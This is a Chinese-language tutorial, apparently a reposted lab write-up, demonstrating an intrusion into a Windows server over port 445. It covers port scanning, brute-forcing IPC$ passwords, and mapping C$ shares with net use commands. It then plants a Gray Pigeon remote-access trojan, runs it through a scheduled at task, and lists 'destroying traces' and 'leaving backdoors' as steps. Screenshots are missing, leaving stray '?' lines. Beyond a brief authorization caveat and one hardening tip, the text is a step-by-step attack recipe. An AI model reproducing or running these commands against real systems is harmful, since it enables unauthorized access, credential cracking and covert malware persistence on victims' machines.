简单渗透测试流程演示(445端口、IPC$、灰鸽子)
目錄
一、實驗流程
二、實驗過程
2.1 信息收集
2.2 利用過程
2.3 暴力破解系統密碼之445
2.4 通過木馬留后門
一、實驗流程
0.授權(對方同意被滲透測試才是合法的。)
1.信息收集
nslookup whois
2.掃描漏洞
namp=ip范圍 端口 80(IIS,apache,什么網站)scanport
高級掃描:如IIS漏洞2003——IIS6.0 2008——IIS7.0
掃描網站漏洞(owasp top10)
3.漏洞利用
4.提權(shell環境、桌面環境、最高權限)
========
5.毀尸滅跡
6.留后門
7.滲透測試報告
手工測試端口號開放:
telnet IP地址 測試端口
1.scanport掃描445端口
2.漏洞利用之IPC$:
進行暴力破解:NTscan
3.
net use \10.1.1.2ipc$ 密碼 /user:用戶
=====================================
net use f: \10.1.1.2share 密碼 /user:用戶
net use f: /del
net use * /del
net use f: \10.1.1.2c$ 密碼 /user:用戶
==========================================
4.制作木馬
利用光盤上的灰鴿子軟件
5.植入木馬(留后門)
copy d:heihei.exe \10.1.1.2c$
6.設置計劃任務自動執行木馬:
net time \10.1.1.2
at \10.1.1.2 11:11 "c:heihei.exe"
7.等待肉雞上線
二、實驗過程
?win7想打server
2.1 信息收集
比如收集445端口的。掃描軟件很多,win平臺以ScanPort為例。
?
?
還可以用telnet命令,不用掃描工具。
例如目前的目標機器10.1.1.1 的 445 端口開著,446 端口關閉。
用telnet分別手動探測這倆端口:
?
?
?
掃描技術就是為了確定攻擊目標。有了445就可以就IPC$漏洞
2.2 利用過程
net use f: \10.1.1.1share 123.abc /user:administrator
這句話是將對方的share路徑映射為本機的F盤。
?
在這個里面可以跟操作本地文件夾目錄一摸一樣。
怎么查看當前有哪幾條連接記錄呢?
?
如何刪除這條記錄呢》
?
想要攻擊服務器的445端口,對于命令
net use f: \10.1.1.1ipc$123.abc /user:administrator
只缺123.abc,即可以通過暴力破解進入對方的ipc$.
(安全建議:服務器管理員別叫Administrator,不建議用戶名跟公司名等有關系)
2.3 暴力破解系統密碼之445
NTscan其實就是不同的利用上述命令。
?
?
可以用真空密碼字典生成器制作字典
?
開始掃描
?
有了密碼就可以為所欲為了、
net use \10.1.1.1ipc$ 123.abc /user:administrator
?
可以查看c盤下所有文件夾
?
2.4 通過木馬留后門
通過灰鴿子,配置服務程序就是制作木馬
?
?
?
運行一下藏在windows server的exe
替server做一個計算任務運行該程序:
查看server時間
?
?
?
可以看到目標機器已經上線。 可以干很多事。。。
?
總結
以上是生活随笔為你收集整理的简单渗透测试流程演示(445端口、IPC$、灰鸽子)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: synchronized实现可见性
- 下一篇: postgreSQL PL/SQL编程学